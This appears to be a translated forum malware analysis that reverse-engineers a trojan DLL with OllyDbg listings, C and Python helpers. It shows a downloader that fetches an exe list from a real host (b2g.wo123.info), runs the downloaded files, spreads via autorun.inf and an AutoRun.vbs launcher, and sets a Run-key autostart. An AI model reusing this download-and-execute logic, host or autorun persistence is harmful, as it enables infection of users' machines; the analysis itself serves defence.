1000296B |. 51 push ecx
1000296C |. 8B55 DC mov edx, dword ptr [ebp-24]
1000296F |. 8B82 B8000000 mov eax, dword ptr [edx+B8]
10002975 |. FFD0 call eax ; InternetOpenUrl
10002977 |. 8945 F4 mov dword ptr [ebp-C], eax
1000297A |. 8B4D 0C mov ecx, dword ptr [ebp+C]
1000297D |. C701 00000000 mov dword ptr [ecx], 0
10002983 |. 50 push eax
10002984 |. B8 01000000 mov eax, 1
10002989 |. B8 02000000 mov eax, 2
1000298E |. B8 03000000 mov eax, 3
10002993 |. B8 04000000 mov eax, 4
10002998 |. B8 05000000 mov eax, 5
1000299D |. B8 0A000000 mov eax, 0A
100029A2 |. 58 pop eax
100029A3 |. C745 EC 01000>mov dword ptr [ebp-14], 1
100029AA |. EB 09 jmp short 100029B5
100029AC |> 8B55 EC /mov edx, dword ptr [ebp-14]
100029AF |. 83C2 01 |add edx, 1
100029B2 |. 8955 EC |mov dword ptr [ebp-14], edx
100029B5 |> 68 581F0000 push 1F58
100029BA |. 6A 00 |push 0
100029BC |. 8B45 DC |mov eax, dword ptr [ebp-24]
100029BF |. 8B48 24 |mov ecx, dword ptr [eax+24]
100029C2 |. FFD1 |call ecx
100029C4 |. 50 |push eax
100029C5 |. 8B55 DC |mov edx, dword ptr [ebp-24]
100029C8 |. 8B42 20 |mov eax, dword ptr [edx+20]
100029CB |. FFD0 |call eax
100029CD |. 8945 E4 |mov dword ptr [ebp-1C], eax
100029D0 |. C745 E8 00000>|mov dword ptr [ebp-18], 0
100029D7 |. 8D4D E8 |lea ecx, dword ptr [ebp-18]
100029DA |. 51 |push ecx
100029DB |. 68 581F0000 |push 1F58
100029E0 |. 8B55 E4 |mov edx, dword ptr [ebp-1C]
100029E3 |. 52 |push edx
100029E4 |. 8B45 F4 |mov eax, dword ptr [ebp-C]
100029E7 |. 50 |push eax
100029E8 |. 8B4D DC |mov ecx, dword ptr [ebp-24]
100029EB |. 8B91 BC000000 |mov edx, dword ptr [ecx+BC]
100029F1 |. FFD2 |call edx ; Wininet.InternetReadFile
100029F3 |. 837D E8 00 |cmp dword ptr [ebp-18], 0 ; if(dwRead == 0)
100029F7 |. 0F84 CA000000 |je 10002AC7 ; if zero bytes were read, jump out.
... ...
At this point we know the downloader does its downloading through the Internet* family of functions in the wininet library, not through URLDownloadToFile.
When stepping over InternetOpenUrl, execution breaks at the DLL entry point, so a thread is created inside it (a breakpoint on CreateRemoteThread catches it).
Since my VM has no internet access, InternetOpenUrl fails, so I fetched the data directly on the host machine and patched it into OD in the VM.
Code:
#include "stdafx.h"      /* Visual Studio precompiled header of the original project */
#include <Windows.h>
#include <WinInet.h>
#include <stdio.h>
#include <tchar.h>
#pragma comment(lib, "Wininet.lib")

int _tmain(int argc, _TCHAR* argv[])
{
    DWORD dwRead = 0;
    char buffer[10000];
    memset(buffer, 0, sizeof(buffer));

    /* Same agent string ("INT") and access type the DLL passes at 10002954. */
    HINTERNET internetopen = InternetOpenA(
        "INT",
        INTERNET_OPEN_TYPE_PRECONFIG /* 0 */,
        NULL,
        NULL,
        0);
    if (internetopen == NULL)
    {
        printf("InternetOpen() failed: %lu\n", GetLastError());
        return 1;
    }

    HINTERNET internetopenurl = InternetOpenUrlA(
        internetopen,
        "http://b2g.wo123.info/02/count.txt",
        NULL,
        0,
        INTERNET_FLAG_PASSIVE | INTERNET_FLAG_NO_CACHE_WRITE,
        0);
    if (internetopenurl == NULL)
    {
        printf("InternetOpenUrl() failed: %lu\n", GetLastError());
        InternetCloseHandle(internetopen);
        return 1;
    }

    /* Read one chunk, leaving room for a terminating NUL so the buffer can be printed as a string. */
    if (InternetReadFile(internetopenurl, buffer, sizeof(buffer) - 1, &dwRead))
    {
        buffer[dwRead] = '\0';
        printf("%s", buffer);
    }
    else
    {
        printf("InternetReadFile() failed: %lu\n", GetLastError());
    }

    InternetCloseHandle(internetopenurl);
    InternetCloseHandle(internetopen);
    return 0;
}
The data obtained is a list of download URLs, one per line, each in the form 1:<url> pointing at an .exe file.
Next, the data obtained is parsed.
10002A33 |. 52 |push edx
10002A34 |. 8B45 F8 |mov eax, dword ptr [ebp-8]
10002A37 |. 50 |push eax
10002A38 |. 8B4D E0 |mov ecx, dword ptr [ebp-20]
10002A3B |. 51 |push ecx
10002A3C |. 8B4D DC |mov ecx, dword ptr [ebp-24]
10002A3F |. E8 4CE6FFFF |call 10001090 ; copy into another memory block.
10002A44 |. 68 581F0000 |push 1F58
10002A49 |. 8B55 E4 |mov edx, dword ptr [ebp-1C]
10002A4C |. 52 |push edx
10002A4D |. 8B45 EC |mov eax, dword ptr [ebp-14]
10002A50 |. 83E8 01 |sub eax, 1
10002A53 |. 69C0 581F0000 |imul eax, eax, 1F58
10002A59 |. 0345 E0 |add eax, dword ptr [ebp-20]
10002A5C |. 50 |push eax
10002A5D |. 8B4D DC |mov ecx, dword ptr [ebp-24]
10002A60 |. E8 2BE6FFFF |call 10001090
10002A65 |. 8B4D F8 |mov ecx, dword ptr [ebp-8]
Part of the code in the call is as follows.
10002BFB |. 50 push eax
10002BFC |. 68 00500010 push 10005000 ; http://b2g.wo123.info/02/count.txt
10002C01 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002C07 |. E8 E4FCFFFF call 100028F0
There is a call to 100028f0 in it. This call takes parameters: it downloads the data at the given URL. The DLL trojan first downloads the count.txt file, then parses out each exe URL,
and then calls 100028f0 in a loop to get the data of each one and writes it to a new file in the system32 directory.
(I will trace it in detail once I get the VM online; here is the outline.)
Execution flow:
download txt;
@@:
parse one url out of the txt
download url;
write new file;
... ...
10002DE3 |. 51 |push ecx
10002DE4 |. 8B95 C0FDFFFF |mov edx, dword ptr [ebp-240]
10002DEA |. 8B42 2C |mov eax, dword ptr [edx+2C]
10002DED |. FFD0 |call eax ; kernel32.WinExec
... ...
jmp @B.
... ...
In addition, a system.exe file is created and executed.
Now we can see that new thread 1 is responsible for downloading the txt download-list file, creating the file C:\Windows\system32\system.exe, and executing it.
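As an added illustration (not code from the post or from the DLL), here is the count.txt parsing loop at 10002C21-10002CA0 ported to Python; the sample list, the placeholder hosts in it, and the assumption that the elided code advances the line pointer past each CRLF are mine.

```python
# Added example (not the DLL's code): a Python port of the count.txt parsing
# loop at 10002C21-10002CA0, so a captured copy of the list can be parsed
# offline the same way the DLL does it.

def parse_download_list(data, size=None):
    """Mirror the loop at 10002C21-10002CA0.

    [ebp-8]   buffer returned by the download call      -> data
    [ebp-C]   byte count reported by the download call  -> size
    [ebp-11C] scan index                                 -> i
    [ebp-4]   start of the current line                  -> line_start
    i runs from 0 while i < size. Whenever data[i] == 0x0D and
    data[i+1] == 0x0A the line is NUL-terminated and the text from
    line_start + 2 onward (the `add ecx, 2` skips the "1:" prefix) is
    handed to the download call. A trailing line without "\\r\\n" is never
    acted on, so it is dropped here as well. Assumption: the elided code
    after 10002CA0 moves line_start past the CRLF before the next round.
    """
    if size is None or size > len(data):
        size = len(data)
    urls = []
    line_start = 0
    for i in range(size):
        if data[i] != 0x0D or i + 1 >= len(data) or data[i + 1] != 0x0A:
            continue
        line = data[line_start:i]
        # The DLL skips two bytes unconditionally; a shorter line would
        # yield an empty or garbage URL, so ignore it.
        if len(line) > 2:
            urls.append(line[2:].decode("ascii", errors="replace"))
        line_start = i + 2
    return urls


# Constructed sample in the same "1:<url>" format as the real count.txt
# (hosts are placeholders, not the ones in the real list); the last entry
# deliberately lacks the CRLF terminator.
SAMPLE = (b"1:http://w1.example.invalid/m01.exe\r\n"
          b"1:http://w2.example.invalid/s01.exe\r\n"
          b"\r\n"
          b"1:http://w3.example.invalid/l1.exe")

if __name__ == "__main__":
    for url in parse_download_list(SAMPLE):
        print(url)
```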
Partial trace of new thread 2:
1000201A |. 6A 00 |push 0
1000201C |. 6A 02 |push 2
1000201E |. 6A 01 |push 1
10002020 |. 6A 00 |push 0
10002022 |. 6A 00 |push 0
10002024 |. 68 00000010 |push 10000000
10002029 |. 8D8D 58FFFFFF |lea ecx, dword ptr [ebp-A8]
1000202F |. 51 |push ecx
10002030 |. 8B95 0CFDFFFF |mov edx, dword ptr [ebp-2F4]
10002036 |. 8B82 80000000 |mov eax, dword ptr [edx+80]
1000203C |. FFD0 |call eax ; kernel32.CreateFileA
1000203E |. 8985 DCFDFFFF |mov dword ptr [ebp-224], eax
10002044 |. 83BD DCFDFFFF>|cmp dword ptr [ebp-224], -1 ; check whether it is INVALID_HANDLE_VALUE
1000204B |. 0F84 26020000 |je 10002277
10002051 |. C685 88FDFFFF>|mov byte ptr [ebp-278], 5B
10002058 |. C685 89FDFFFF>|mov byte ptr [ebp-277], 41
1000205F |. C685 8AFDFFFF>|mov byte ptr [ebp-276], 75
10002066 |. C685 8BFDFFFF>|mov byte ptr [ebp-275], 74
1000206D |. C685 8CFDFFFF>|mov byte ptr [ebp-274], 6F
10002074 |. C685 8DFDFFFF>|mov byte ptr [ebp-273], 52
1000207B |. C685 8EFDFFFF>|mov byte ptr [ebp-272], 75
... ...
This is creating autorun.inf (C:\autorun.inf). The movs below write the content of autorun.inf dynamically (purpose: AV evasion, defeating file signature detection).
0006F5E7 00 00 00 00 00 28 F7 06 00 00 00 92 7C 5B 41 75 .....(?...抾[Au
0006F5F7 74 6F 52 75 6E 5D 0D 0A 73 68 65 6C 6C 65 78 65 toRun]..shellexe
0006F607 63 75 74 65 3D 41 75 74 6F 52 75 6E 2E 76 62 73 cute=AutoRun.vbs
0006F617 0D 0A 73 68 65 6C 6C 5C 41 75 74 6F 5C 63 6F 6D ..shell\Auto\com
0006F627 6D 61 6E 64 3D 41 75 74 6F 52 75 6E 2E 76 62 73 mand=AutoRun.vbs
0006F637 0D 0A 0D 0A 0D 0A F6 06 00 0E 44 93 7C 70 09 93 ......?.D搢p.
After that comes the creation of Autorun.vbs; I won't paste the disassembly, it is too long.
vbs content:
0006F57B 00 73 65 74 20 79 75 3D 77 73 63 72 69 70 74 2E .set yu=wscript.
0006F58B 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 77 73 createobject("ws
0006F59B 63 72 69 70 74 2E 73 68 65 6C 6C 22 29 0D 0A 79 cript.shell")..y
0006F5AB 75 2E 72 75 6E 20 22 63 6D 64 20 2F 63 20 73 74 u.run "cmd /c st
0006F5BB 61 72 74 20 73 79 73 74 65 6D 2E 65 78 65 22 2C art system.exe",
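Added example, not from the original post: recover the autorun.inf text from the dump lines above and flag its launch keys, which is what a scan of drive roots for this infection should look for. The dump lines are copied from the page; the list of launch keys and risky extensions is my assumption.

```python
import re

# The six OllyDbg dump lines quoted above (ASCII column dropped).
DUMP_LINES = [
    "0006F5E7 00 00 00 00 00 28 F7 06 00 00 00 92 7C 5B 41 75",
    "0006F5F7 74 6F 52 75 6E 5D 0D 0A 73 68 65 6C 6C 65 78 65",
    "0006F607 63 75 74 65 3D 41 75 74 6F 52 75 6E 2E 76 62 73",
    "0006F617 0D 0A 73 68 65 6C 6C 5C 41 75 74 6F 5C 63 6F 6D",
    "0006F627 6D 61 6E 64 3D 41 75 74 6F 52 75 6E 2E 76 62 73",
    "0006F637 0D 0A 0D 0A 0D 0A F6 06 00 0E 44 93 7C 70 09 93",
]

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
RISKY_EXT = (".vbs", ".exe", ".bat", ".cmd", ".js", ".scr", ".pif", ".com")

def bytes_from_dump(lines):
    """Take the 16 hex bytes that follow the address on each dump line."""
    out = bytearray()
    for line in lines:
        tokens = line.split()[1:17]
        if len(tokens) != 16 or not all(HEX_BYTE.match(t) for t in tokens):
            raise ValueError("not a 16-byte dump line: " + line)
        out.extend(int(t, 16) for t in tokens)
    return bytes(out)

def extract_autorun_inf(blob):
    """Cut the INI text out of the surrounding stack bytes: it starts at
    '[AutoRun]' and the DLL's writer ends it with a run of CRLFs, after
    which unrelated stack data (and eventually a NUL) follows."""
    start = blob.find(b"[AutoRun]")
    if start < 0:
        raise ValueError("no [AutoRun] section in dump")
    end = blob.find(b"\x00", start)
    text = blob[start:end if end >= 0 else len(blob)].decode("latin-1")
    cut = text.rfind("\r\n")
    return text[:cut + 2] if cut >= 0 else text

def parse_autorun(text):
    """key -> value pairs of the [AutoRun] section, keys lower-cased."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif "=" in line and section == "autorun":
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def launch_targets(entries):
    """Launch keys (open, shellexecute, shell\\<verb>\\command) whose target
    is a script or executable: on a drive root that is the infection pattern
    described above, so it is what a scan of drive roots should flag."""
    return sorted((k, v) for k, v in entries.items()
                  if LAUNCH_KEY.match(k) and v.lower().endswith(RISKY_EXT))

if __name__ == "__main__":
    inf = extract_autorun_inf(bytes_from_dump(DUMP_LINES))
    print(inf)
    print(launch_targets(parse_autorun(inf)))
```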
Then the system.exe file is created:
10002652 |. 8B82 94000000 |mov eax, dword ptr [edx+94]
10002658 |. FFD0 |call eax ; kernel32.CopyFileA
Stack:
0006F56C 0006F9A0 ASCII "C:\WINDOWS\system32\system.exe"
0006F570 0006F744 ASCII "C:\system.exe"
There is a loop here, so drives C, D, E and so on are all affected. We can see the DLL copies system.exe from the system32 directory to the root of drive C.
So the original trojan must have a system.exe that calls the Export function of this DLL.
The DLL enumerates starting from drive C; when CreateFile fails it assumes all drives have been enumerated.
In thread 2, the call above (10001CC0) is responsible for the autorun infection.
This is the function of thread 2:
1000307A |> /B8 01000000 /mov eax, 1
1000307F |. |85C0 |test eax, eax
10003081 |. |74 34 |je short 100030B7
10003083 |. |8D8D D8FDFFFF |lea ecx, dword ptr [ebp-228]
10003089 |. |E8 32ECFFFF |call 10001CC0 ; Autorun infection
1000308E |. |8D8D D8FDFFFF |lea ecx, dword ptr [ebp-228]
10003094 |. |E8 97EAFFFF |call 10001B30
10003099 |. |50 |push eax
1000309A |. |B8 01000000 |mov eax, 1
1000309F |. |B8 0A000000 |mov eax, 0A
100030A4 |. |58 |pop eax
100030A5 |. |68 D0070000 |push 7D0
100030AA |. |8B8D D0FDFFFF |mov ecx, dword ptr [ebp-230]
100030B0 |. |8B51 40 |mov edx, dword ptr [ecx+40]
100030B3 |. |FFD2 |call edx
100030B5 |.^\EB C3 \jmp short 1000307A ; as you can see, this is an infinite loop.
...
The program runs a while(1) { ... } that keeps re-creating autorun.inf, so it cannot be deleted.
The call below (10001B30) is as follows:
It writes an encrypted string via mov byte ptr ..., then decrypts it with the DecodeString function; the decrypted content is as follows:
0006F838 65 6D 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 em..SOFTWARE\Mic
0006F848 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 rosoft\Windows\C
0006F858 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 urrentVersion\Ru
0006F868 6E 00 66 00 A4 FA 06 00 99 30 00 10 58 1F 00 00 n.f..?.X..
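Added example, not the DLL's or the post's code: it reassembles the strings the DLL builds with runs of mov byte ptr (as here and for the mutex name and agent string earlier) and ports the XOR decoder listed at 10001059 near the top of this part. The two listings are copied from the page; the decode key is a constructed one, since the real key is not shown in the post.

```python
# Added example (not the DLL's code): reassemble the strings the DLL builds
# with runs of `mov byte ptr [ebp-N], XX` and apply the XOR decoder at
# 10001059 to them. The key the DLL uses is not on the page, so the decode
# round-trip below uses a constructed key.
import re

MOV_BYTE = re.compile(
    r"mov\s+byte\s+ptr\s+\[ebp-([0-9A-Fa-f]+)\],\s*([0-9A-Fa-f]+)", re.I)

def stack_string(listing):
    """Collect every `mov byte ptr [ebp-N], XX` in an OllyDbg listing and
    return the bytes in memory order: the largest N is the lowest address,
    so memory order is descending N."""
    cells = {}
    for m in MOV_BYTE.finditer(listing):
        cells[int(m.group(1), 16)] = int(m.group(2), 16)
    return bytes(cells[n] for n in sorted(cells, reverse=True))

def cstr(buf):
    """Cut at the first NUL, the way the C string consumers see it."""
    return buf.split(b"\x00", 1)[0]

def decode_string(src, key):
    """Port of the routine at 10001059 (stdcall: src, dst, length, key).
    `movsx` sign-extends each byte into eax before the `xor eax, [ebp+14]`
    with the full 32-bit key, but only `al` is written to dst, so only the
    low key byte matters and the sign extension never reaches the output."""
    return bytes((b ^ key) & 0xFF for b in src)

# Copy of the mov byte ptr run at 100031FC-10003218 (the mutex name).
MUTEX_LISTING = """
100031FC |. C645 F8 7E mov byte ptr [ebp-8], 7E
10003200 |. C645 F9 7E mov byte ptr [ebp-7], 7E
10003204 |. C645 FA 7E mov byte ptr [ebp-6], 7E
10003208 |. C645 FB 21 mov byte ptr [ebp-5], 21
1000320C |. C645 FC 7E mov byte ptr [ebp-4], 7E
10003210 |. C645 FD 7E mov byte ptr [ebp-3], 7E
10003214 |. C645 FE 7E mov byte ptr [ebp-2], 7E
10003218 |. C645 FF 00 mov byte ptr [ebp-1], 0
"""
# Copy of the run at 1000292F-1000293B (the InternetOpenA agent string).
AGENT_LISTING = """
1000292F |. C645 FC 49 mov byte ptr [ebp-4], 49
10002933 |. C645 FD 4E mov byte ptr [ebp-3], 4E
10002937 |. C645 FE 54 mov byte ptr [ebp-2], 54
1000293B |. C645 FF 00 mov byte ptr [ebp-1], 0
"""

# Decrypted value recovered on the page for the 10001B30 string.
RUN_KEY_PATH = b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
DEMO_KEY = 0x5A  # constructed; the real key is not shown in the post

if __name__ == "__main__":
    print(cstr(stack_string(MUTEX_LISTING)))
    print(cstr(stack_string(AGENT_LISTING)))
    enc = decode_string(RUN_KEY_PATH, DEMO_KEY)
    print(decode_string(enc, DEMO_KEY) == RUN_KEY_PATH)
```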
Afterwards it writes the registry autostart entry:
... ...
10001CB9 |. FFD2 call edx ; ADVAPI32.RegSetValueExA
...
stack:
0006F814 00000218
0006F818 0006F834 ASCII "system"
0006F81C 00000000
0006F820 00000001
0006F824 0006F9A0 ASCII "C:\WINDOWS\system32\system.exe"
After that come the FreeLibrary and other cleanup actions, but because of the infinite loop, the DLL stays in the host process forever.
Sample in the attachment. Password: pediy